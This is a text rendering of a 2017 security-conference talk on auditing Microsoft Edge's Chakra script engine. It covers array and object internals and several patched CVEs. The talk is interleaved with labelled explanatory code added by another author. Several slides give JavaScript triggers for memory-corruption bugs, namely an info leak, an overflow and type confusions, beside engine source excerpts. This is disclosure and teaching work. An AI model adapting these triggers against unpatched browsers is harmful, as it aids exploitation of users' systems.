The ECMA and the Chakra: Hunting bugs in the Microsoft Edge Script Engine
Slides from HITB Security Conference 2017 Amsterdam (conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...)
About Me
● Natalie Silvanovich AKA natashenka
● Project Zero member
● Flash researcher
● ECMAScript enthusiast
Microsoft Edge Research
● Code reviewed script engine (Chakra)
● Found 13 bugs, now fixed
● First modern browser review
● Learned a lot about JavaScript
This talk
● What is Edge/Chakra/ECMAScript?
● Script engine features and design
● Bugs
Introduction
What are Edge and Chakra
● Edge: Windows 10 browser
● Chakra: Edge’s open-source ECMAScript core
○ Regularly updated
○ Accepts external contributions
What is ECMAScript
● ECMAScript == JavaScript (mostly)
● JavaScript engines implement the ECMAScript standard
● ES7 released in June
Features and Implementation
Script Engine Design
● Key features
○ Arrays
○ Objects
○ Typing
○ Garbage collection
Array Design
● Arrays are a foundational element of script engines (second only to Objects)
● Sounds simple, but details are complicated
Array Design
var array = [1, 2, 3, 4];
var array2 = new Array(1, 2, 3, 4);
Array Design
var a = ["bob", "joe", "kim"];
var b = [1, "bob", {}, new RegExp()];
var c = [[], [[]], [[], []]];
var d = [1, 2, 3];
d[10000] = 7;
Array Design
var a = [1, 2, 3];
a["banana"] = 4;
a.grape = 5;
Array Design
var a = [1, 2, 3];
Object.defineProperty(a, "0", {value : 1, writable : false});
var b = ["hello"];
Object.freeze(b);
Array Design
function func() {}  // placeholder accessor
var a = [1, 2, 3];
Object.defineProperty(a, "0", {get : func, set : func});
Array Design
var a = [0, 1, 2];
a[4] = 4;
a.__proto__ = [0, 1, 2, 3, 4, 5];
alert(a[3]); // is 3
Array object            Array.prototype         Object.prototype
  __proto__  -------->    __proto__  -------->    __proto__ (null)
  0                       sort                    __defineGetter__
  1                       slice                   toString
  ...                     ...                     ...
Array Design
function func() {}  // placeholder accessor
var a = [0, 1, 2];
a[4] = 4;
a.__proto__ = [];
Object.defineProperty(a.__proto__, "0", {get : func, set : func});
Array Design
function func() { return 0; }  // placeholder accessor
Object.defineProperty(Array.prototype, "0", {get : func, set : func});
var a = [];
alert(a[0]); // calls func
Array Design
var a = [0, 2, 1];
// each result below is shown for the original a = [0, 2, 1]
a.slice(1);           // [2, 1] (a is unchanged)
a.splice(1, 2, 3, 4); // a becomes [0, 3, 4]
a.sort();             // [0, 1, 2]
a.indexOf(1);         // 2
Array Promotion
● The vast, vast majority of arrays are simple, but some are very complicated
● Every modern browser has multiple array memory layouts, and events that trigger transitions between them
Chakra Implementation
IntegerArray
   |  add a float
   v
FloatArray
   |  add a non-numeric value
   v
VarArray
   |  configure a value (e.g. read-only)
   v
ES5Array
Array Conversion
● Integer, Float and ES5 arrays are subclasses of the Var Array superclass
● vtable swapping (for real)
Array Memory Layout
IntArray                 IntSegment
  vtable                   length
  length                   size
  head  ---------------->  left
  ...                      next
                           element[0]
                           ...
Array Format
● Limited sparseness
○ A dense array is just a sparse array with one segment
○ Arrays only become property arrays in exceptional situations (a property on an index)
● Array segments can be inline
Array Memory Layout (conversion from IntArray to FloatArray, step by step)

Step 1: the starting state, an IntArray with an IntSegment
IntArray                 IntSegment
  vtable                   length
  length                   size
  head  ---------------->  left
  ...                      next
                           element[0]
                           ...

Step 2: the object's vtable is swapped to FloatArray's; the segment is still an IntSegment
IntArray                 IntSegment
  vtable<FloatArray>       length
  length                   size
  head  ---------------->  left
  ...                      next
                           element[0]
                           ...

Step 3: the segment is converted to a FloatSegment
IntArray                 FloatSegment
  vtable<FloatArray>       length
  length                   size
  head  ---------------->  left
  ...                      next
                           element[0]
                           ...
(Simple) Object Format
● Objects are similar to Arrays, but optimized for properties instead of elements
● Similar setup, with simple and dictionary properties and transitions
○ Also exotic types, like deferred and path
● Less bug-prone
Objects
var o = new Object();
o.prop = "hello";
var o2 = { prop : "hello" };
Objects
var o = { month : "April", day : 14 };
var o1 = { "1" : 1, "2" : "test" };
var o2 = { prop : { prop : {} }};
var o3 = Object.freeze( o2 );
Interesting Question
var a = [0, 1, 2, 3];
var o = { "0" : 0, "1" : 1, "2" : 2, "3" : 3 };
a.__proto__ = null;
o.__proto__ = null;
Array.prototype.slice.call(a, 0, 2); // [0, 1]
Array.prototype.slice.call(o, 0, 2); // [0, 1];
Objects
var a = [0, 1, 2, 3];
var o = { "0" : 0, "1" : 1, "2" : 2, "3" : 3 };
o.length = "banana";
a.length = "banana"; // Uncaught RangeError: Invalid array length
Script Engine Terminology
● “Fast path” == “when things are normal”
○ Optimized behaviour when objects are in common or expected states
○ But are they?
● “Slow path” == “handles all cases safely and correctly”
○ But does it?
Complex Objects
● Objects can also be built-in types with special memory backings
○ RegExp, Map, Set, Function, etc.
● Classes can be declared, extending any of these types
Typing
● Objects need handles to be used by script
● Script needs to differentiate between types
● In Chakra:
○ Handles are either pointers or ints, differentiated by the 48th bit
○ Pointer handles can point to any object types, and a field in the object needs to be checked
Typing
var i = 7;             // handle = (7 | (1 << 48)) = 0x1000000000007
var o = {};            // handle = ptr
var r = new RegExp();  // handle = ptr
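The tagging scheme on the two typing slides, as an added example that is not from the talk and not Chakra's code: a model in which a 64-bit handle is either a raw pointer or a 32-bit integer with bit 48 set. It works because a user-mode x64 address is canonical and below 2^47, so a real pointer never has that bit set. The names tagInt, untagInt, isTaggedInt and describeHandle are assumptions for this illustration, and BigInt stands in for the engine's 64-bit word.

```javascript
// Added example (not Chakra's code): a model of the tagged-handle scheme the
// slide describes. A 64-bit Var is a raw pointer, or a 32-bit integer with
// bit 48 set. Helper names are assumptions for this illustration.
const TAG_BIT = 1n << 48n;           // 0x1000000000000
const MASK32 = 0xffffffffn;

function tagInt(i) {
  if (!Number.isInteger(i) || i < -0x80000000 || i > 0x7fffffff) {
    throw new RangeError("only int32 values are tagged; other numbers are boxed");
  }
  // keep the int32 two's-complement pattern in the low 32 bits, then set the tag
  return (BigInt(i) & MASK32) | TAG_BIT;
}

function isTaggedInt(handle) {
  return (handle & TAG_BIT) !== 0n;
}

function untagInt(handle) {
  if (!isTaggedInt(handle)) throw new TypeError("handle is a pointer, not an int");
  const u = handle & MASK32;
  return Number(u >= 0x80000000n ? u - 0x100000000n : u);   // sign-extend
}

// A type check on a handle: the tag bit settles the integer case without a
// dereference; only a pointer needs the object's own type field inspected.
function describeHandle(handle) {
  return isTaggedInt(handle) ? `int ${untagInt(handle)}` : `ptr 0x${handle.toString(16)}`;
}
```

The value on the slide, 0x1000000000007 for the integer 7, is what tagInt(7) returns; a constructed user-mode pointer such as 0x7ffd12345678n is classified as a pointer because bit 48 is clear.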
Garbage Collection
● Can be conservative or non-conservative
○ Chakra is very conservative
Bugs
CVE-2016-7189
● Info leak in Array.join due to Array index getter
CVE-2016-7189
var t = new Array(1, 2, 3);
Object.defineProperty(t, '2', {
  get: function() {
    t[0] = {};
    for (var i = 0; i < 100; i++) { t[i] = {a : i}; }
    return 7;
  }
});
var s = [].join.call(t);
CVE-2016-7189
JavascriptString* JavascriptArray::JoinArrayHelper(T * arr, JavascriptString* separator, ScriptContext* scriptContext)
{
    ...
    for (uint32 i = 1; i < arrLength; i++)
    {
        if (hasSeparator)
        {
            cs->Append(separator);
        }
        if (TryTemplatedGetItem(arr, i, &item, scriptContext))
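The fast-path question from the terminology slide, illustrated on the join bug above as an added example that is not from the talk and not ChakraCore code: a toy model of an array builtin that calls back into script through an index getter. ModelArray, naiveJoin and safeJoin are assumed names; the "segment" is a plain JavaScript array standing in for the engine's element storage, and replaceSegment stands in for an array conversion that discards the old storage.

```javascript
// Added example (not from the talk, not ChakraCore code): a toy model of why
// a builtin must not cache backing-store state across a call into script.
// ModelArray, naiveJoin and safeJoin are assumed names for this illustration.
class ModelArray {
  constructor(values) {
    this.segment = values.slice();   // stands in for the engine's element segment
    this.accessors = new Map();      // index -> getter, as defineProperty would install
  }
  get length() { return this.segment.length; }
  defineGetter(index, fn) { this.accessors.set(index, fn); }
  // Element read: runs script when an accessor is installed at that index.
  getItem(index) {
    const getter = this.accessors.get(index);
    return getter ? getter.call(this) : this.segment[index];
  }
  // Models an array conversion: the old segment is discarded and replaced.
  replaceSegment(values) { this.segment = values.slice(); }
}

// Fast-path style: length and the segment "pointer" are read once, up front.
// A getter that converts or shrinks the array leaves both of them stale.
function naiveJoin(arr, sep = ",") {
  const segment = arr.segment;   // cached pointer to the backing store
  const len = arr.length;        // cached length
  const parts = [];
  for (let i = 0; i < len; i++) {
    const getter = arr.accessors.get(i);
    // once a getter has run, segment[i] refers to storage the array no longer owns
    parts.push(String(getter ? getter.call(arr) : segment[i]));
  }
  return parts.join(sep);
}

// Slow-path style: re-read the length and resolve every element through the
// array itself on each iteration, so a call-out cannot leave stale state behind.
function safeJoin(arr, sep = ",") {
  const parts = [];
  for (let i = 0; i < arr.length; i++) {
    parts.push(String(arr.getItem(i)));
  }
  return parts.join(sep);
}

// Constructed scenario: the getter on index 1 converts the array mid-join,
// leaving it with a single element.
function makeConvertingArray() {
  const arr = new ModelArray([1, 2, 3]);
  arr.defineGetter(1, function () {
    this.replaceSegment(["a"]);
    return "G";
  });
  return arr;
}
```

naiveJoin returns "1,G,3": the trailing 3 comes from the discarded segment, which in a real engine is a read from memory the getter may already have freed or repurposed, the shape of the info leak on this slide. safeJoin returns "1,G" because it notices the new length after the getter returns.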
CVE-2016-3386
● Another issue due to a getter on an array
● An overflow this time
CVE-2016-3386
function q(){}
var t = [1, 2];
t.length = 4;
Object.defineProperty(t, '3',
{ get: function() {t.length = 10000; }});
q(...t);
CVE-2016-3386
if (argsIndex + arr->GetLength() > destArgs.Info.Count)
{
    AssertMsg(false, "The array length has changed since we allocated the destArgs buffer?");
    Throw::FatalInternalError();
}
for (uint32 j = 0; j < arr->GetLength(); j++)
{
    var element;
    if (!arr->DirectGetItemAtFull(j, &element))
    {
        element = undefined;
    }
    destArgs.Values[argsIndex++] = element;
}
CVE-2016-7202
● Segmentation issue due to array index interceptor
CVE-2016-7202
var a = [1];
a.length = 1000;
var o = {};
Object.defineProperty(o, '1', {
  get: function() {
    a.length = 1002;
    [].fill.call(a, 7.7);
    return 2;
  }
});
a.__proto__ = o;
var r = [].reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
CVE-2016-7202
length = JavascriptConversion::ToUInt32( JavascriptOperators::OP_GetLength(obj, scriptContext), ...);
…
pArr->FillFromPrototypes(0, (uint32)length);
…
seg->left = ((uint32)length) - (seg->left + seg->length);
Array.species
“But what if I subclass an array and slice it, and I want the thing I get back to be a regular Array and not the subclass?”
class MyArray extends Array {
  static get [Symbol.species]() { return Array; }
}
● Easily implemented by inserting a call to script into *every single* Array native call
CVE-2016-7200 (Array.filter)
● Bug in Array conversion due to Array.species
CVE-2016-7200
class dummy {
  constructor() { return [1, 2, 3]; }
}
class MyArray extends Array {
  static get [Symbol.species]() { return dummy; }
}
var a = new MyArray({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i) { return true; }
var o = a.filter(test);
CVE-2016-7200 (Array.filter)
RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);
...
newArr = JavascriptArray::FromVar(newObj);
…
if (!pArr->DirectGetItemAtFull(k, &element))
...
selected = CALL_ENTRYPOINT(callBackFn->GetEntryPoint(), callBackFn, CallInfo(CallFlags_Value, 4),
    thisArg, element, JavascriptNumber::ToVar(k, scriptContext), pArr);
if (JavascriptConversion::ToBoolean(selected, scriptContext))
{
    // Try to fast path if the return object is an array
    if (newArr)
    {
        newArr->DirectSetItemAt(i, element);
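The species hook from the Array.species slide and the filter fast path above, as an added example that is not from the talk and not ChakraCore code: a species-aware filter written in JavaScript, showing the point at which ArraySpeciesCreate hands control to user script and the two checks a builtin needs afterwards. The same rule applies to any other call-out from a builtin, Proxy traps included. arraySpeciesCreate, naiveFilter, checkedFilter, ShrinkingSpecies, FrozenSpecies and makeVictim are assumed names for this illustration.

```javascript
// Added example (not from the talk, not ChakraCore code): a species-aware
// filter in JavaScript. After arraySpeciesCreate has run user script, the
// source may have changed and the result may not be an Array at all.
function arraySpeciesCreate(original, length) {
  let C = original.constructor;
  if (C !== undefined && C !== null) {
    const S = C[Symbol.species];       // a user-defined getter may run here
    if (S !== undefined && S !== null) C = S;
  }
  if (C === undefined || C === null) return new Array(length);
  return new C(length);                // user constructor: may return any object
}

// Fast path that trusts everything it read before the call-out.
function naiveFilter(source, predicate) {
  const len = source.length;           // cached before species runs
  const out = arraySpeciesCreate(source, 0);
  let n = 0;
  for (let i = 0; i < len; i++) {
    if (predicate(source[i], i, source)) out[n++] = source[i]; // reads past the live end
  }
  return out;
}

// Same operation with the validation the spec's algorithm requires: HasProperty
// before each read, and a real-Array test before taking the indexed-store path.
function checkedFilter(source, predicate) {
  const len = source.length;
  const out = arraySpeciesCreate(source, 0);
  const fastPath = Array.isArray(out); // only a genuine Array gets plain indexed stores
  let n = 0;
  for (let i = 0; i < len; i++) {
    if (!(i in source)) continue;      // index vanished during a call-out: skip it
    const v = source[i];
    if (!predicate(v, i, source)) continue;
    if (fastPath) {
      out[n] = v;
    } else if (!Reflect.defineProperty(out, String(n),
        { value: v, writable: true, enumerable: true, configurable: true })) {
      throw new TypeError("species result rejected element " + n); // CreateDataPropertyOrThrow
    }
    n++;
  }
  return out;
}

// Constructed test subject 1: the species getter shrinks the array being filtered.
let victim = null;
class ShrinkingSpecies extends Array {
  static get [Symbol.species]() {
    if (victim) victim.length = 1;
    return Array;
  }
}
function makeVictim() {
  victim = new ShrinkingSpecies();
  victim.push(10, 20, 30, 40);
  return victim;
}

// Constructed test subject 2: the species constructor returns a frozen non-array.
class FrozenSpecies extends Array {
  static get [Symbol.species]() {
    return function () { return Object.freeze({}); };
  }
}
```

On the shrinking subject, naiveFilter returns a four-element array whose last three entries are undefined, the JavaScript-level shadow of the out-of-bounds read an engine would make; checkedFilter returns [10]. On the frozen subject, checkedFilter refuses with a TypeError instead of silently treating a non-array as array storage.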
Proxy
“But what if I want to debug Javascript in Javascript?”
var handler = {
  get: function(target, name) {
    return name in target ? target[name] : 37;
  }
};
var p = new Proxy({}, handler);
CVE-2016-7201
● Array conversion error due to array prototype fallback
CVE-2016-7201
var a = new Array(0x11111111, 0x22222222, 0x33333333, ...
var handler = {
  getPrototypeOf: function(target, name) { return a; }
};
var p = new Proxy([], handler);
var b = [{}, [], "natalie"];
b.__proto__ = p;
b.length = 4;
a.shift.call(b); // b[2] is type confused
CVE-2016-7201
void JavascriptArray::InternalFillFromPrototype(JavascriptArray *dstArray, const T& dstIndex, JavascriptArray *srcArray, uint32 start, uint32 end, uint32 count)
{
    RecyclableObject* prototype = srcArray->GetPrototype();
    while (start + count != end && JavascriptOperators::GetTypeId(prototype) != TypeIds_Null)
    {
        ForEachOwnMissingArrayIndexOfObject(srcArray, dstArray, prototype, start, end, dstIndex, [&](uint32 index, Var value)
        {
            T n = dstIndex + (index - start);
            dstArray->DirectSetItemAt(n, value);
            count++;
        });
        prototype = prototype->GetPrototype();
    }
}
Internal Scripts, Strict Mode and Redefinition
● Sometimes JavaScript functions are written in script, especially slow path
○ More foolproof than natives
○ Problematic if user code can alter its behaviour (due to developer assumptions)
● Strict mode is only part of the solution
Internal Scripts, Strict Mode and Redefinition
"use strict";
function do_builtin_stuff() {
  var o = {};
  o.stuff = {};
  Object.freeze(o);
  global.nativeChangeStuff(o);
  return o;
}
Internal Scripts, Strict Mode and Redefinition
● Two problems
"use strict";
// problem 1: an accessor on Object.prototype intercepts the internal script's o.stuff = {}
function f() { this.stuff = 7; }
Object.defineProperty(Object.prototype, "stuff", {get : f, set : f});
Internal Scripts, Strict Mode and Redefinition
"use strict";
// problem 2: Object.freeze itself is replaced, so the internal script's call no longer freezes anything
function f() { this.stuff = 7; }
Object.freeze = f;
Internal Scripts, Strict Mode and Redefinition
● More frequent as slow paths move to script
● Chakra uses less “host script” than other browsers
○ Internationalization only
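The two redefinition problems from the slides above, as an added example that is not from the talk: the slide's do_builtin_stuff is modelled by buildNaive (the nativeChangeStuff native is left out), and buildDefensive is the same routine written the way a defensive internal script would be, with the builtins it needs captured once at load time, a null-prototype object, and a property definition instead of an assignment. runAfterRedefinition is a constructed harness that performs both redefinitions first, runs the internal script, and then undoes them. All names are assumptions for this illustration.

```javascript
// Added example (not from the talk): why "use strict" alone does not protect an
// internal script from page-level redefinition, and what does.
const $freeze = Object.freeze;
const $isFrozen = Object.isFrozen;
const $defineProperty = Object.defineProperty;
const $create = Object.create;
const $hasOwn = Object.prototype.hasOwnProperty;

// Mirrors the slide's internal script: the assignment walks the prototype chain
// and the freeze is a global lookup, strict mode or not.
function buildNaive() {
  var o = {};
  o.stuff = {};          // problem 1: hits any setter for "stuff" on Object.prototype
  Object.freeze(o);      // problem 2: calls whatever Object.freeze is right now
  return o;
}

// Defensive version: captured builtins, no prototype to inherit accessors from,
// and a definition that never invokes a setter.
function buildDefensive() {
  const o = $create(null);
  $defineProperty(o, "stuff", { value: {}, writable: true, enumerable: true, configurable: true });
  $freeze(o);
  return o;
}

// Constructed harness: page script installs an accessor for "stuff" on
// Object.prototype and replaces Object.freeze, then the internal script runs.
// Both changes are undone afterwards so the environment is left as it was.
function runAfterRedefinition(build) {
  const captured = [];
  $defineProperty(Object.prototype, "stuff", {
    get() { return undefined; },
    set(value) { captured.push(this); },   // page script now holds the internal object
    configurable: true,
  });
  Object.freeze = function (x) { return x; }; // freeze becomes a no-op
  try {
    const o = build();
    return {
      hasOwnStuff: $hasOwn.call(o, "stuff"),  // did the property land on the object?
      frozen: $isFrozen(o),                   // did the freeze take effect?
      leakedToPage: captured.includes(o),     // did page script observe the object?
    };
  } finally {
    delete Object.prototype.stuff;
    Object.freeze = $freeze;
  }
}
```

For buildNaive the harness reports no own "stuff" property, an unfrozen object, and a reference to the internal object held by page script; for buildDefensive it reports the property present, the object frozen, and nothing observed. Capturing builtins only helps if the capture happens before any page script runs, which is why such scripts are loaded at engine initialisation.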
![Page 65: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/65.jpg)
CVE-2016-7287
● Type confusion in internationalization due to lack of type checking
![Page 66: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/66.jpg)
CVE-2016-7287
In host JS:
Object.defineProperty(Intl, "Collator", { value: Collator, writable: true, enumerable: false, configurable: true });
In natives:
if (!Js::JavascriptOperators::GetProperty(intlObject, objectPropertyId, &propertyValue, scriptContext))
{
    return;
}
if (!Js::JavascriptOperators::GetProperty(prototypeVal = DynamicObject::FromVar(propertyValue), Js::PropertyIds::resolvedOptions, &propertyValue, scriptContext))
![Page 67: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/67.jpg)
CVE-2016-7287
var d = Object.defineProperty;
var noobj = { get: function () { return 0x1234567 >> 1; } };
function f() {
  var i = Intl;
  d(i, "Collator", noobj);
}
Object.defineProperty = f;
var q = new Intl.NumberFormat(["en"]);
![Page 68: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/68.jpg)
Simple Error
● It happens!
![Page 69: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/69.jpg)
CVE-2016-7286
Var* newArgs = HeapNewArray(Var, numArgs);
switch (numArgs)
{
case 1: break;
case 2: newArgs[1] = args[1]; break;
case 3: newArgs[1] = args[1]; newArgs[2] = args[2]; break;
default: Assert(UNREACHED);
}
![Page 70: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/70.jpg)
CVE-2016-7286
var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4);
![Page 71: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/71.jpg)
Conclusions
● ECMAScript has a lot of features
● JavaScript design and implementation decisions affect bug types
● Understanding design decisions is important